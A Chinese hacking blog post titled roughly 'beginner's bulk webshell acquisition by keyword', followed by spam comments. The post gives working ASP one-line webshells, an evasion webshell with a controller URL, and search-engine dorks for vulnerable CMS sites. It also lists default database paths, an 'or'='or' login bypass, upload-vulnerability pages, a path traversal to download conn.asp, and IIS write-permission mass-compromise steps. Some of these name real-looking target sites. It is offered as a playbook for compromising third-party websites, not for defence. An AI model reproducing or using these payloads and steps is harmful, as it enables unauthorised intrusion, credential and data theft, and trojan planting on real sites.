您的足迹:首页 > 攻防技术 >小白批量拿webshell(关键字)

小白批量拿webshell(关键字)

shell提示不能更改目录时候可以通过上传的方法然后替换他的目录文件达到替换的目的

弹出很快的提示就是SCRIPT代码 可以通过修改代码本地提交。。登录页面也一样。。。。

 

 

 

一句话木马  :

<%If request("a") ="m" then eval request("am") end if %>


一句话图片木马 可以直接用客户端链接图片网址上传大马。


###############################################################################
免查杀的webshell

代码插入任意ASP中INDEX 最佳

<object id=fs RUNAT=SERVER  classid='clsid:0D43FE01-F093-11CF-8940-00A0C9054228'></object><%if request("xb")<>"" then Session("b")=request("xb")
if Session("b")<>"" then execute Session("b")%>
控制端http://tx.qzinfo.cn/cs.asp  用于上传木马 (一句话也可以实现)


###############################################################################
网站猎手2.0
关键字:inurl:Went.asp
插入后缀:manage/login.asp
密码:'or'='or'
###############################################################################
先用挖掘机
搜索: 格式13117101402
后缀是 upfile_other.asp 

###############################################################################
关键词: 飞越公司企业网站管理系统
后辍:  databases\21asp.mdb
后台: admin/Login.asp
默认密码: admin-admin
###############################################################################
关键词:  用户登陆 产品查询 产品列表 在线调查 新闻资讯  企业新闻  业内资讯
后辍:  Databases/myszw.mdb
插入后缀: admin/login.asp
###############################################################################
关键字:企业邮局企业荣誉营销网络产品分类信息反馈联系我们收藏本站
漏洞文件:/db/com02.mdb
默认后台地址:admin/login.asp
###############################################################################
关键字:格式0791-6274752
             
          格式13075666897

          格式0377-66885652

          格式0791-8059439

          格式0791-6274752

          格式0310-5173992
漏洞文件:/upfile_other.asp,先注册个用户名,然后在使用上传工具上传木马

###############################################################################

关键词: 资讯中心 软件分类 最近更新 推荐下载 用户注册 用户登陆
漏洞文件:upfile.asp
###############################################################################

关键词:亲爱的顾客
漏洞文件:upfile_flash.asp

###############################################################################
关键字:inurl:Msmir_DownLoad
传奇默认数据库:/msmir_net.mdb,/msmir/msmir.mdb
关键词:Msmir_Services  Msmir_DownLoads Msmir_Experience Msmir_GameFAQ Msmir_GameRoles Msmir_News Msmir_img

########################################################################################################

文件名是/manage/login.asp
关键词是  went.asp 用  "or"="or"来登陆 

#########################################################################################

关键字:Co Net MIB Ver 1.0网站后台管理系统 
帐号密码为    "or"="or"

#########################################################################################

后辍    /Database/#newasp.mdb
关键词:NewAsp SiteManageSystem Version

###############################################################################
用挖掘机 
关键字:Powered by WEBBOY
后辍:/upfile.asp
###############################################################################
关键字:powered by mypower
后辍:Upfile_Article.asp bbs/upfile.asp 
###############################################################################
上传漏洞.  工具 : Domain3.5 网站猎手 1.5版
关键字      powered by mypower 检测的页面或文件
插入        upfile_photo.asp
###############################################################################
新云漏洞 。
G关键字 关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录
把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp
大家时常碰到数据库如果前面或者中间加了# 可以用#替换就可以下载了 \database\#newasp.mdb
如:#xzws.mdb 改成#xzws.mdb
###############################################################################

通吃所有商城+动力上传系统 
使用工具:挖掘鸡 v1.1 明小子 
关键字:选购 加入购物车 去收银台 确认收货人信息 选付款方式 选配送方式 在线支付或下单后汇款 汇款确认 发货 完成
漏洞页面:upload.asp  upfile_flash.asp 

###############################################################################

动力入侵: 关键字:powered by mypower
漏洞页面:upfile_photo.asp Upfile_Soft.asp upfile_adpic.asp upfile_softpic.asp 

###############################################################################

入侵魔兽***
工具:ASP木马一只。 Domain3.5明小子
关键字:All Right Reserved Design:游戏联盟
后台地址:admin/login.asp
数据库的地址:chngame/#chngame.mdb 


###############################################################################

关键字:尚奈克斯
后台路径/system/manage.asp  直接传ASP木马

###############################################################################

工具 1:网站猎手 2:大马一个
关键字:切勿关闭Cookies功能,否则您将不能登录
插入diy.asp

###############################################################################

关键字:Team5 Studio All rights reserved
默认数据库:data/team.mdb

###############################################################################

关键字:Powered by:QCDN_NEWS 随便扫遍文章加一个  '    ,来试探注入点
后台地址:admin_index.asp
###############################################################################

入侵雷池新闻发布系统
关键字:leichinews
去掉leichinews后面的. 打上:admin/uploadPic.asp过滤了Type=mod&picName=xuanran.asp
再上传马..... 进访问uppic anran.asp 登陆马. 

###############################################################################

关键字:Power System Of Article Management Ver 3.0 Build 20030628
默认数据库:database\yiuwekdsodksldfslwifds.mdb 
后台地址:自己扫描!

###############################################################################

通过GOOGLE搜索找大量注入点
关键字:asp?id=1 gov.jp/ asp?id=
页数:100
语言:想入侵哪个国家就填什么语言吧 

###############################################################################

关键字:Powered by:94KKBBS 2005
利用密码找回功能
找回admin 提问:ddddd 回答:ddddd

###############################################################################

关键字:****** inurl:readnews.asp
把最后一个/改成\ ,直接暴库,看密码,进后台 随便添加个新闻 在标题输入我们的一句话木马

###############################################################################

关键字:程序核心:BJXSHOP网上开店专家 
后台:/admin

先用google搜索 inurl:flasher_list.asp,

随便选 一个吧http://****.***.com/flasher_list.asp

则默认数据库下载地址为http://****.***.com/database/flash.mdb

后台为http://****.***.com//manager/

搜索这个flasher_list.asp也可以用Momain3.5注入,因为这个本身就有注入漏洞

###############################################################################

动易

先搜索关键字:Copyright 2003-2004 动易网络,
例如是http://bkpg.xmu.edu.cn/Admin_Login.asp则试试提交http://bkpg.xmu.edu.cn/upfile_soft.asp如出现:请登录后再使用本功能!

那么我们可以打开Domain了

-选项卡 综合上传=>动力上传漏洞=>.....

-填上有漏洞网站的UPFILE_SOFT页面 http://bkpg.xmu.edu.cn/upfile_soft.asp上传木马~~~~

###############################################################################

动力文章管理系统漏洞

搜索关键字:Article Management Ver 3.0

如是http://www.nokia365.com/

则默认数据库下载地址为http://www.nokia365.com/database\yiuwekdsodksldfslwifds.mdb

后台http://www.nokia365.com/Admin_login.asp

#############################################################################
找网吧主机IP就是利用抓包工具→ → 查询余额 后面显示的就是主机IP
###############################################################################

动易漏洞

搜Powered By Dvbbs Version 7.1.0

或Powered By :Dvbbs Version 7.0.0 Sp2

或Powered by:Dvbbs Version 6.0.0

则默认数据库下载地址为网站后加

bbs/data/dvbbs7.mdb

或ddata/dvbbs7.mdb

或bbs/data/dvbbs6.mdb

当然,你可以搜索Dvbbs Version 用其挖掘鸡或网站猎手,添加后缀,
/data/dvbbs7.mdb
/bbs/Data/dvbbs7.MDB,

OBlog漏洞

用网站猎手搜索:powered by OBlog ver2.22

添加后缀,data/oblog221.mdb

###############################################################################

用挖掘机
关键字:Powered by WEBBOY
页面:/upfile.asp

###############################################################################

1.打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cartopen source。
这是一个商场系统。
2.网站的最底部分,有个 Comersus Open Technologies LC。打开看下~~comersus系统~
猜到,comersus.mdb. 是数据库名
数据库都是放在database/ 后的,
所以database/comersus.mdb
comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。
那样把前一个''store/''除去,再加上database/comersus.mdb 试试

###############################################################################

国外站的爆库漏洞
关键字:sad Raven's Guestbook
密码地址:/passwd.dat
后台地址:/admin.php


###############################################################################

旁注一下 baidu搜索

随便写搜索内容+inurl:asp这个的不会很多但是1面应该也有个几个
inurl: (asp?=数字)
inurl: (php?=数字)
随便写搜索内容+ inurl:asp

在google里 输入 asp?id=    扫注入点  在啊D 或者名小子里

###############################################################################

IIS写权限之批量拿站
baidu扫描站点 → →  ping ip → →  IISPutScanner扫描可利用主机  双击写入大/小马

→ → (文件格式TXT)  → →  iiswrite更改文件类型(move选项)→ →
传大马

###############################################################################

在网站猎手里搜索:客服电话:移动电话:传真:客服信箱:客服QQ
插入:admin/upload.asp?fuptype=db&fupname=shopbackup&frmname=db

###############################################################################

通过后台拿webshell的初级教程
①.在上传文件框处使用抓包工具找出上传地址...如 在POST处查看  /Flash/upload/shot_upfile.asp...
②.然后用名小子的上传漏洞工具上传大马会DIY.ASP 进一步提权 挂马

###############################################################################

关键字:Powered By :SMT Version 5.0
后戳:/bbs/upfile.asp,/upfile_flash.asp

#################################################################################


关键字:Powered By Kesion Inc
默认数据库  ks_data/ks_database.mdb


###########################################################

啊D上面打开网页  google 找关键字 inurl:MtvID=?  注入


###########################################################


网页在线编辑器 → →  密码ADMIN 帐号ADMIN → →  添加上传类型 asa  → →  上传小马
→ → 预览得到地址→ → 上传大马→ → 入侵提权。。。。

本博客所有文章如无特别注明均为原创。作者:浩神复制或转载请以超链接形式注明转自 浩神博客
原文地址《小白批量拿webshell(关键字)

相关推荐

发表评论

路人甲 表情
Ctrl+Enter快速提交

网友评论(25)

I have been browsing online more than 9 hours today for textured ceiling repairs &
小白批量拿webshell(关键字), yet I never found
any interesting article like yours. It's pretty worth enough for me.
In my view, if all webmasters and bloggers made good content as you did,
the internet will be much more useful than ever before.
NJ 5天前 回复
Everything posted was actually very logical. But, consider this, what if you were
to write a awesome headline? I ain't saying your content isn't solid, however what if you added a headline to maybe get a person's attention? I mean 小白批量拿webshell(关键字) - 浩神博客 is a little vanilla. You should peek at Yahoo's front page and watch how they create article headlines to grab people to open the links. You might add a video or a picture or two to grab readers excited about everything've got to say. In my opinion, it would bring your blog a little bit more interesting.
Justin 5天前 回复
I drop a comment whenever I especially enjoy a post on a site or I have something to valuable to contribute to the
conversation. Usually it is a result of the fire displayed in the post I browsed.

And on this post 小白批量拿webshell(关键字) - 浩神博客.
I was actually excited enough to write a thought :-P I actually do have a couple of questions for you
if you usually do not mind. Is it only me or does it
give the impression like a few of these comments look like left by brain dead folks?
:-P And, if you aare posting on other sites, I'd like to keep up with anything fresh you have to post.

Would you make a list every one of all your community sites like your Facebook page, twitter
feed, or linkedin profile?
QO 6天前 回复
I've been reviewing online more than seven hours today for 1/2
Price Pro Calgary Painting & 小白批量拿webshell(关键字), yet I never found any interesting article like yours.
It is pretty worth enough for me. In my opinion, if all site owners and bloggers made good content as you did, the net
will be much more useful than ever before.
OV 3周前 (2017-11-06) 回复
I've been surfing online more than seven hours today
for 1/2 Price Pro Calgary Painting & 小白批量拿webshell(关键字), yet
I never found any interesting article like yours. It is pretty
worth enough for me. In my opinion, if all web owners and bloggers made good content as you did, the
web will be much more useful than ever before.
HZ 3周前 (2017-11-02) 回复
I think that everything published was very reasonable.
However, what about this? what if you added a little information? I mean, I don't wish to tell you
how to run your website, but suppose you added a headline
that grabbed folk's attention? I mean 小白批量拿webshell(关键字) - 浩神博客
is a little vanilla. You could glance at Yahoo's front page and note how they create article
titles to get viewers interested. You might try adding a video or
a picture or two to grab readers interested about what you've written. In my opinion, it would
make your posts a little bit more interesting.
DW 3周前 (2017-10-31) 回复
传奇私服一条龙制作www.06vk.com新魔界开区一条龙服务端www.06vk.com-客服咨询QQ1124999543(企鹅扣扣)-Email:1124999543@qq.com 骑士私服一条龙www.06vk.com
EY 4周前 (2017-10-27) 回复
魔域sf一条龙开服www.119uc.com决战开区一条龙服务端www.119uc.com-客服咨询QQ1292124634(企鹅扣扣)-Email:1292124634@qq.com 魔力宝贝私服架设www.119uc.com
RT 1个月前 (2017-10-25) 回复
魔兽sf一条龙服务端www.45ur.com魔域私服一条龙服务端www.45ur.com-客服咨询QQ1207542352(企鹅扣扣)-Email:1207542352@qq.com 天龙私服全套www.45ur.com
HF 1个月前 (2017-10-20) 回复
Non-fraudulent violation of the regulation 非故意违反规定.
KH 1个月前 (2017-10-15) 回复
1 2 3

© Emlog大前端浩神修改版 theme By 浩神